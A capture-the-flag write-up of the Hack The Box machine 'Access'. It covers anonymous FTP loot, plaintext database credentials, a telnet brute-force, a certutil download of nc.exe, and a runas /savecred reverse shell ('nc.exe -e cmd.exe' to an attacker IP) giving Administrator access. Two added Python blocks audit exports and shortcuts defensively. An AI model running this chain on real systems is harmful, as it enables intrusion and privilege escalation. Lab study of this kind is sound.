Access
Wed, 02 October 2024
Platform: Hack The Box
sudo nmap 10.10.10.98 -sV -Pn -r -g53 -D 1.1.1.1 -p- --min-rate=3000 -sC
Nmap scan report for 10.10.10.98
Host is up (0.020s latency).
Not shown: 65532 filtered tcp ports (no-response)
PORT STATE SERVICE VERSION
21/tcp open ftp Microsoft ftpd
| ftp-anon: Anonymous FTP login allowed (FTP code 230)
|_Can't get directory listing: PASV failed: 425 Cannot open data connection.
| ftp-syst:
|_ SYST: Windows_NT
23/tcp open telnet?
80/tcp open http Microsoft IIS httpd 7.5
| http-methods:
|_ Potentially risky methods: TRACE
|_http-server-header: Microsoft-IIS/7.5
|_http-title: MegaCorp
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 205.49 seconds
ftp anonymous@10.10.10.98
Connected to 10.10.10.98.
Remote system type is Windows_NT.
ftp> ls
08-23-18 09:16PM <DIR> Backups
08-24-18 10:00PM <DIR> Engineer
ftp> cd Backups
ftp> ls
08-23-18 09:16PM 5652480 backup.mdb
ftp> cd Engineer
ftp> ls
08-24-18 01:16AM 10870 Access Control.zip
ftp> get backup.mdb
local: backup.mdb remote: backup.mdb
22% |***************** | 1258 KiB 1.22 MiB/s 00:03 ETA
ftp: Reading from network: Interrupted system call
0% | | -1 0.00 KiB/s --:-- ETA
WARNING! 613 bare linefeeds received in ASCII mode.
File may not have transferred correctly.
ftp> passive
ftp> binary
ftp> get backup.mdb ftp/backup.mdb
local: ftp/backup.mdb remote: backup.mdb
100% |******************************************************************************| 5520 KiB 1.33 MiB/s 00:00 ETA
5652480 bytes received in 00:04 (1.32 MiB/s)
ftp> passive
ftp> binary
ftp> get Access\ Control.zip ftp/accesscontrol.zip
local: ftp/accesscontrol.zip remote: Access Control.zip
100% |******************************************************************************| 10870 56.42 KiB/s 00:00 ETA
10870 bytes received in 00:00 (50.91 KiB/s)
mdb-tables backup.mdb -1 | sort -u > mdbtables.list
ACGroup
ACTimeZones
ACUnlockComb
AUTHDEVICE
AlarmLog
AttParam
AuditedExc
BioTemplate
CHECKEXACT
CHECKINOUT
CustomReport
DEPARTMENTS
DeptUsedSchs
EXCNOTES
EmOpLog
FaceTemp
FaceTempEx
FingerVein
FingerVeinEx
HOLIDAYS
LeaveClass
LeaveClass1
LossCard
Machines
NUM_RUN
NUM_RUN_DEIL
OfflinePermitDoors
OfflinePermitGroups
OfflinePermitUsers
ParamSet
ReportField
ReportItem
SECURITYDETAILS
SHIFT
STD_WiegandFmt
SchClass
ServerLog
SystemLog
TBKEY
TBSMSALLOT
TBSMSINFO
TEMPLATE
TEMPLATEEx
TmpPermitDoors
TmpPermitGroups
TmpPermitUsers
USERINFO
USER_OF_RUN
USER_SPEDAY
USER_TEMP_SCH
UserACMachines
UserACPrivilege
UserUpdates
UserUsedSClasses
UsersMachines
ZKAttendanceMonthStatistics
acc_antiback
acc_auxiliary
acc_door
acc_firstopen
acc_firstopen_emp
acc_holidays
acc_interlock
acc_levelset
acc_levelset_door_group
acc_levelset_emp
acc_linkageio
acc_map
acc_mapdoorpos
acc_monitor_log
acc_morecardempgroup
acc_morecardgroup
acc_morecardset
acc_reader
acc_timeseg
acc_wiegandfmt
acholiday
action_log
areaadmin
att_attreport
att_waitforprocessdata
attcalclog
attexception
auth_group
auth_group_permissions
auth_message
auth_permission
auth_user
auth_user_groups
auth_user_user_permissions
base_additiondata
base_appoption
base_basecode
base_datatranslation
base_operatortemplate
base_option
base_personaloption
base_strresource
base_strtranslation
base_systemoption
dbapp_viewmodel
dbbackuplog
deptadmin
devcmds
devcmds_bak
devlog
django_content_type
django_session
empitemdefine
iclock_dstime
iclock_oplog
iclock_testdata
iclock_testdata_admin_area
iclock_testdata_admin_dept
operatecmds
personnel_area
personnel_cardtype
personnel_empchange
personnel_issuecard
personnel_leavelog
userinfo_attarea
worktable_groupmsg
worktable_instantmsg
worktable_msgtype
worktable_usrmsg
while IFS= read -r t; do
mdb-json backup.mdb "$t" > "$t.json"
done < mdbtables.list
ls
ACGroup.json TmpPermitGroups.json auth_user.json
ACTimeZones.json TmpPermitUsers.json auth_user_groups.json
ACUnlockComb.json USERINFO.json auth_user_user_permissions.json
AUTHDEVICE.json USER_OF_RUN.json backup.mdb
AlarmLog.json USER_SPEDAY.json base_additiondata.json
AttParam.json USER_TEMP_SCH.json base_appoption.json
AuditedExc.json UserACMachines.json base_basecode.json
BioTemplate.json UserACPrivilege.json base_datatranslation.json
CHECKEXACT.json UserUpdates.json base_operatortemplate.json
CHECKINOUT.json UserUsedSClasses.json base_option.json
CustomReport.json UsersMachines.json base_personaloption.json
DEPARTMENTS.json ZKAttendanceMonthStatistics.json base_strresource.json
DeptUsedSchs.json acc_antiback.json base_strtranslation.json
EXCNOTES.json acc_auxiliary.json base_systemoption.json
EmOpLog.json acc_door.json dbapp_viewmodel.json
FaceTemp.json acc_firstopen.json dbbackuplog.json
FaceTempEx.json acc_firstopen_emp.json deptadmin.json
FingerVein.json acc_holidays.json devcmds.json
FingerVeinEx.json acc_interlock.json devcmds_bak.json
HOLIDAYS.json acc_levelset.json devlog.json
LeaveClass.json acc_levelset_door_group.json django_content_type.json
LeaveClass1.json acc_levelset_emp.json django_session.json
LossCard.json acc_linkageio.json empitemdefine.json
Machines.json acc_map.json ftptree.py
NUM_RUN.json acc_mapdoorpos.json iclock_dstime.json
NUM_RUN_DEIL.json acc_monitor_log.json iclock_oplog.json
OfflinePermitDoors.json acc_morecardempgroup.json iclock_testdata.json
OfflinePermitGroups.json acc_morecardgroup.json iclock_testdata_admin_area.json
OfflinePermitUsers.json acc_morecardset.json iclock_testdata_admin_dept.json
ParamSet.json acc_reader.json lol.csv
ReportField.json acc_timeseg.json lol.json
ReportItem.json acc_wiegandfmt.json mdbtables.list
SECURITYDETAILS.json accesscontrol.zip mdbtables.list.json
SHIFT.json acholiday.json operatecmds.json
STD_WiegandFmt.json action_log.json personnel_area.json
SchClass.json areaadmin.json personnel_cardtype.json
SystemLog.json att_waitforprocessdata.json personnel_issuecard.json
TBKEY.json attcalclog.json personnel_leavelog.json
TBSMSALLOT.json attexception.json userinfo_attarea.json
TBSMSINFO.json auth_group.json worktable_groupmsg.json
TEMPLATE.json auth_group_permissions.json worktable_instantmsg.json
TEMPLATEEx.json auth_message.json worktable_msgtype.json
TmpPermitDoors.json auth_permission.json worktable_usrmsg.json
cat *.json | grep -i 'passw'
{"id":25,"username":"admin","password":"admin","Status":1,"last_login":"08/23/18 21:11:47","RoleID":26}
{"id":27,"username":"engineer","password":"access4u@security","Status":1,"last_login":"08/23/18 21:13:36","RoleID":26}
{"id":28,"username":"backup_admin","password":"admin","Status":1,"last_login":"08/23/18 21:14:02","RoleID":26}
admin:admin
engineer:access4u@security
backup_admin:admin
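The grep above works because the exported auth table stores passwords as plaintext, which is the underlying finding. The following is an added example, not code from the writeup, showing how that check can be made systematic over a set of mdb-json exports: mdb-json emits one JSON object per line, so each table is scanned row by row, columns whose name suggests a secret are picked out, and each value is classified as a recognisable hash format or as apparent plaintext. The sample rows are constructed here in the same shape as the page's output but with made-up values; the column-name and hash-format heuristics are mine.

```python
"""Find plaintext credentials in mdb-json table exports (added example)."""
import json
import re

# Column names worth inspecting (heuristic; will also catch e.g. "PassCount").
SECRET_COLUMN = re.compile(r"pass(word|wd)?|pwd|secret|\bpin\b", re.IGNORECASE)

# Recognisable stored forms. Anything not matching is reported as plaintext.
STORED_FORMS = [
    ("hex_digest", re.compile(r"^(?:[0-9a-f]{32}|[0-9a-f]{40}|[0-9a-f]{64}|[0-9a-f]{128})$", re.I)),
    ("modular_crypt", re.compile(r"^\$(?:1|2[abxy]?|5|6|7|argon2(?:i|d|id)|y)\$")),
    ("django", re.compile(r"^(?:pbkdf2_sha256|pbkdf2_sha1|argon2|bcrypt_sha256|bcrypt|scrypt)\$")),
    ("lm_nt_pair", re.compile(r"^[0-9a-f]{32}:[0-9a-f]{32}$", re.I)),
]


def classify(value) -> str:
    """Label a stored secret value: 'empty', a known hash form, or 'plaintext'."""
    if value is None or value == "":
        return "empty"
    text = str(value)
    for label, pattern in STORED_FORMS:
        if pattern.match(text):
            return label
    return "plaintext"


def scan_table(table: str, ndjson: str) -> list:
    """Scan one mdb-json export (one object per line); one finding per secret-like cell."""
    findings = []
    for lineno, line in enumerate(ndjson.splitlines(), 1):
        if not line.strip():
            continue
        row = json.loads(line)
        for column, value in row.items():
            if not SECRET_COLUMN.search(column):
                continue
            findings.append({
                "table": table,
                "line": lineno,
                "row_id": row.get("id", row.get("USERID")),
                "column": column,
                "kind": classify(value),
            })
    return findings


def scan_exports(exports: dict) -> list:
    """Scan {table_name: ndjson_text} and return every finding."""
    out = []
    for table, text in exports.items():
        out.extend(scan_table(table, text))
    return out


def plaintext_findings(exports: dict) -> list:
    """Only the cells that hold an apparently unhashed secret."""
    return [f for f in scan_exports(exports) if f["kind"] == "plaintext"]


# Constructed sample exports: values are made up, the shape follows mdb-json output.
SAMPLE_EXPORTS = {
    "auth_user.json": "\n".join([
        '{"id":1,"username":"alice","password":"Summer2018!","Status":1,"RoleID":26}',
        '{"id":2,"username":"bob","password":"pbkdf2_sha256$36000$saltsaltsalt$3q7Zt6kM8XyXy5x3QmQz9a0G9mJk1wO0Xc2vQ9Fl4Ls=","Status":1,"RoleID":26}',
        '{"id":3,"username":"svc_backup","password":"","Status":0,"RoleID":26}',
    ]),
    "USERINFO.json": "\n".join([
        '{"USERID":7,"Name":"Carol","Password":"1234","CardNo":"000123"}',
        '{"USERID":8,"Name":"Dave","Password":"5f4dcc3b5aa765d61d8327deb882cf99","CardNo":"000124"}',
    ]),
}

if __name__ == "__main__":
    for f in scan_exports(SAMPLE_EXPORTS):
        print(f"{f['table']}:{f['line']} {f['column']}={f['kind']}")
```

Run against a directory of real exports by reading each `*.json` file into the `SAMPLE_EXPORTS`-style dict; every `plaintext` finding is a table that needs hashing (or removal from backups that end up on an anonymous FTP share).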
7z x accesscontrol.zip -p'access4u@security' -o'accesscontrol'
7-Zip 24.08 (x64) : Copyright (c) 1999-2024 Igor Pavlov : 2024-08-11
64-bit locale=C.UTF-8 Threads:8 OPEN_MAX:1024
Scanning the drive for archives:
1 file, 10870 bytes (11 KiB)
Extracting archive: accesscontrol.zip
--
Path = accesscontrol.zip
Type = zip
Physical Size = 10870
Everything is Ok
Size: 271360
Compressed: 10870
file Access\ Control.pst
Access Control.pst: Microsoft Outlook Personal Storage (>=2003, Unicode, version 23), dwReserved1=0x234, dwReserved2=0x22f3a, bidUnused=0000000000000000, dwUnique=0x39, 271360 bytes, bCryptMethod=1, CRC32 0x744a1e2e
readpst Access\ Control.pst
Opening PST file and indexes...
Processing Folder "Deleted Items"
"Access Control" - 2 items done, 0 items skipped.
ls
'Access Control.mbox' 'Access Control.pst'
cat Access\ Control.mbox
From "john@megacorp.com" Fri Aug 24 00:44:07 2018
Status: RO
From: john@megacorp.com <john@megacorp.com>
Subject: MegaCorp Access Control System "security" account
To: 'security@accesscontrolsystems.com'
Date: Thu, 23 Aug 2018 23:44:07 +0000
MIME-Version: 1.0
Hi there,
The password for the “security” account has been changed to 4Cc3ssC0ntr0ller. Please ensure this is passed on to your engineers.
Regards,
John
security:4Cc3ssC0ntr0ller
cat usernames
engineer
backup_admin
admin
security
john
cat passwords
admin
access4u@security
4Cc3ssC0ntr0ller
nmap 10.10.10.98 -p 23 --script telnet-brute \
--script-args userdb=usernames,passdb=passwords
PORT STATE SERVICE
23/tcp open telnet
| telnet-brute:
| Accounts:
| security:4Cc3ssC0ntr0ller - Valid credentials
|_ Statistics: Performed 24 guesses in 17 seconds, average tps: 1.4
Nmap done: 1 IP address (1 host up) scanned in 21.26 seconds
telnet 10.10.10.98
Trying 10.10.10.98...
Connected to 10.10.10.98.
Escape character is '^]'.
Welcome to Microsoft Telnet Service
login: security
password:
*===============================================================
Microsoft Telnet Server.
*===============================================================
C:\Users\security>
C:\Users>tree /F
Folder PATH listing
Volume serial number is 8164-DB5F
C:.
    Administrator
    Public
        Documents
        Downloads
        Music
            Sample Music
        Pictures
            Sample Pictures
        Videos
            Sample Videos
    security
        .yawcam
            banlist.dat
            pass.dat
            ver.dat
            yawcam_settings.xml
            2
                banlist.dat
                pass.dat
                ver.dat
                yawcam_settings.xml
                extravars
                    README.txt
                    {temperature}.txt
                img
                logs
                    info.txt
                motion
                stream
                    favicon.ico
                    README.txt
                    template_js.html
                    template_mjpg.html
                    template_wm.html
                    img
                        back.jpg
                        banned.jpg
                        bg.gif
                        datalimit.jpg
                        kicked.jpg
                        loading.jpg
                        mrk.gif
                        offline.jpg
                        pass.jpg
                        timelimit.jpg
                        toomany.jpg
                tmp
                    Readme.txt
                www
                    favicon.ico
                    index.html
                    update.html
                    wap.xhtml
            extravars
                README.txt
                {temperature}.txt
            img
            logs
                info.txt
            motion
            stream
                favicon.ico
                README.txt
                template_js.html
                template_mjpg.html
                template_wm.html
                img
                    back.jpg
                    banned.jpg
                    bg.gif
                    datalimit.jpg
                    kicked.jpg
                    loading.jpg
                    mrk.gif
                    offline.jpg
                    pass.jpg
                    timelimit.jpg
                    toomany.jpg
            tmp
                Readme.txt
            www
                favicon.ico
                index.html
                update.html
                wap.xhtml
        Contacts
        Desktop
            user.txt
        Documents
        Downloads
        Favorites
            Links
                Suggested Sites.url
                Web Slice Gallery.url
            Microsoft Websites
                IE Add-on site.url
                IE site on Microsoft.com.url
                Microsoft At Home.url
                Microsoft At Work.url
                Microsoft Store.url
            MSN Websites
                MSN Autos.url
                MSN Entertainment.url
                MSN Money.url
                MSN Sports.url
                MSN.url
                MSNBC News.url
            Windows Live
                Get Windows Live.url
                Windows Live Gallery.url
                Windows Live Mail.url
                Windows Live Spaces.url
        Links
            Desktop.lnk
            Downloads.lnk
            RecentPlaces.lnk
        Music
        Pictures
        Saved Games
        Searches
        Videos
C:\Users\security\Desktop>type user.txt
13264509f5333c2ce144a11d50e45dcb
C:\Users>tree %public%/desktop /f
Folder PATH listing
Volume serial number is 8164-DB5F
C:\USERS\PUBLIC\DESKTOP
ZKAccess3.5 Security System.lnk
C:\Users\Public\Desktop>type "ZKAccess3.5 Security System.lnk"
LF@ 7#P/PO :+00/C:\R1M:Windows:M:*wWindowsV1MVSystem32:MV*System32X2P:
runas.exe:1:1*Yrunas.exeL-KEC:\Windows\System32\runas.exe#..\..\..\Windows\System32\runas.exeC:\ZKTeco\ZKAccess3.5G/user:ACCESS\Administrator /savecred "C:\ZKTeco\ZKAccess3.5\Access.exe"'C:\ZKTeco\ZKAccess3.5\img\AccessNET.ico%SystemDrive%\ZKTeco\ZKAccess3.5\img\AccessNET.ico%SystemDrive%\ZKTeco\ZKAccess3.5\img\AccessNET.ico%
...C:\Windows\System32\runas.exe...
.../user:ACCESS\Administrator /savecred...
C:\Users\security>cmdkey /list
Currently stored credentials:
Target: Domain:interactive=ACCESS\Administrator
Type: Domain Password
User: ACCESS\Administrator
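The shortcut on the Public desktop and the `cmdkey /list` entry together are the whole privilege-escalation condition: a saved Administrator credential that `runas /savecred` will hand to any program the low-privileged user names. From the defender's side the same condition can be audited by parsing shortcuts for that switch. The block below is an added example, not code from the writeup: it parses the ShellLinkHeader and StringData sections of a .lnk file per the MS-SHLLINK layout (skipping the optional LinkTargetIDList and LinkInfo blocks) and flags any shortcut whose arguments contain `/savecred`. `build_lnk()` only constructs test fixtures; the RelativePath, arguments and icon strings of `SAVECRED_LNK` are the ones visible in the dumped shortcut above, everything else (the notepad shortcut, the placeholder IDList bytes) is made up.

```python
"""Audit Windows shortcuts (.lnk) for runas /savecred (added example)."""
import struct

HEADER_SIZE = 0x4C
LINK_CLSID = bytes.fromhex("0114020000000000c000000000000046")

# LinkFlags bits (MS-SHLLINK section 2.1.1).
HAS_LINK_TARGET_ID_LIST = 1 << 0
HAS_LINK_INFO = 1 << 1
HAS_NAME = 1 << 2
HAS_RELATIVE_PATH = 1 << 3
HAS_WORKING_DIR = 1 << 4
HAS_ARGUMENTS = 1 << 5
HAS_ICON_LOCATION = 1 << 6
IS_UNICODE = 1 << 7

# StringData fields appear in this fixed order, each present only if its flag is set.
STRING_DATA = [
    ("name", HAS_NAME),
    ("relative_path", HAS_RELATIVE_PATH),
    ("working_dir", HAS_WORKING_DIR),
    ("arguments", HAS_ARGUMENTS),
    ("icon_location", HAS_ICON_LOCATION),
]


def parse_lnk(data: bytes) -> dict:
    """Return LinkFlags and the StringData fields of a shell link."""
    if len(data) < HEADER_SIZE or struct.unpack_from("<I", data, 0)[0] != HEADER_SIZE:
        raise ValueError("not a shell link: bad HeaderSize")
    if data[4:20] != LINK_CLSID:
        raise ValueError("not a shell link: bad LinkCLSID")
    flags = struct.unpack_from("<I", data, 0x14)[0]
    pos = HEADER_SIZE
    if flags & HAS_LINK_TARGET_ID_LIST:  # u16 IDListSize, then the item list
        pos += 2 + struct.unpack_from("<H", data, pos)[0]
    if flags & HAS_LINK_INFO:  # u32 LinkInfoSize includes the size field itself
        pos += struct.unpack_from("<I", data, pos)[0]
    fields = {"flags": flags}
    for name, bit in STRING_DATA:
        if not flags & bit:
            fields[name] = None
            continue
        count = struct.unpack_from("<H", data, pos)[0]  # CountCharacters, no terminator
        pos += 2
        if flags & IS_UNICODE:
            fields[name] = data[pos:pos + 2 * count].decode("utf-16-le")
            pos += 2 * count
        else:
            fields[name] = data[pos:pos + count].decode("cp1252", "replace")
            pos += count
    return fields


def uses_saved_credential(fields: dict) -> bool:
    """True when the shortcut's arguments carry the runas /savecred switch."""
    args = (fields.get("arguments") or "").lower()
    return "/savecred" in args.split()


def build_lnk(relative_path: str, arguments: str, icon: str, id_list: bytes = b"") -> bytes:
    """Construct a minimal Unicode shell link as a test fixture (not a real file)."""
    flags = HAS_RELATIVE_PATH | HAS_ARGUMENTS | HAS_ICON_LOCATION | IS_UNICODE
    if id_list:
        flags |= HAS_LINK_TARGET_ID_LIST
    # HeaderSize, CLSID, LinkFlags, FileAttributes(ARCHIVE), 3 timestamps, FileSize,
    # IconIndex, ShowCommand(SW_SHOWNORMAL), HotKey, Reserved1..3 = 76 bytes.
    header = struct.pack("<I16sIIQQQIiIHHII", HEADER_SIZE, LINK_CLSID, flags,
                         0x20, 0, 0, 0, 0, 0, 1, 0, 0, 0, 0)
    body = struct.pack("<H", len(id_list)) + id_list if id_list else b""
    for s in (relative_path, arguments, icon):
        body += struct.pack("<H", len(s)) + s.encode("utf-16-le")
    return header + body


# Constructed fixtures: strings from the box's shortcut, plus a harmless one.
SAVECRED_LNK = build_lnk(
    r"..\..\..\Windows\System32\runas.exe",
    r'/user:ACCESS\Administrator /savecred "C:\ZKTeco\ZKAccess3.5\Access.exe"',
    r"C:\ZKTeco\ZKAccess3.5\img\AccessNET.ico",
    id_list=b"\x00" * 20,  # opaque placeholder IDList, exercises the skip path
)
BENIGN_LNK = build_lnk(r"..\..\..\Windows\System32\notepad.exe",
                       r"C:\notes.txt", r"%SystemRoot%\system32\notepad.exe")

if __name__ == "__main__":
    for label, blob in (("savecred", SAVECRED_LNK), ("benign", BENIGN_LNK)):
        f = parse_lnk(blob)
        print(label, f["relative_path"], "->", "FLAG" if uses_saved_credential(f) else "ok")
```

Pointed at `C:\Users\Public\Desktop\*.lnk` (or any shared profile folder), a hit from this check is the cue to remove the stored credential with `cmdkey /delete` and to stop using `/savecred` for administrative shortcuts; the absolute target path lives in the skipped LinkInfo block, so the parser reports the RelativePath only.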
C:\Users\security>net user Administrator
User name Administrator
Full Name
Comment Built-in account for administering the computer/domain
User's comment
Country code 000 (System Default)
Account active Yes
Account expires Never
Password last set 8/21/2018 10:01:12 PM
Password expires Never
Password changeable 8/21/2018 10:01:12 PM
Password required No...
FILENAME=nc.exe && cp "$FILENAME" /tmp/ && python3 -m http.server -d /tmp 8088
powershell -c "certutil -urlcache -f http://10.10.16.7:8088/nc.exe nc.exe"
10.10.10.98 - - [02/Oct/2024 01:13:30] "GET /nc.exe HTTP/1.1" 200 -
10.10.10.98 - - [02/Oct/2024 01:13:30] "GET /nc.exe HTTP/1.1" 200 -
C:\Users\security>runas /user:Administrator /savecred "nc.exe -e cmd.exe 10.10.16.7 4435"
Connection received on 10.10.10.98 49183
Microsoft Windows [Version 6.1.7600]
Copyright (c) 2009 Microsoft Corporation. All rights reserved.
C:\Windows\system32>whoami
access\administrator
C:\Windows\system32>type C:\users\administrator\desktop\root.txt
b5f43372554f616079063b440b5d206b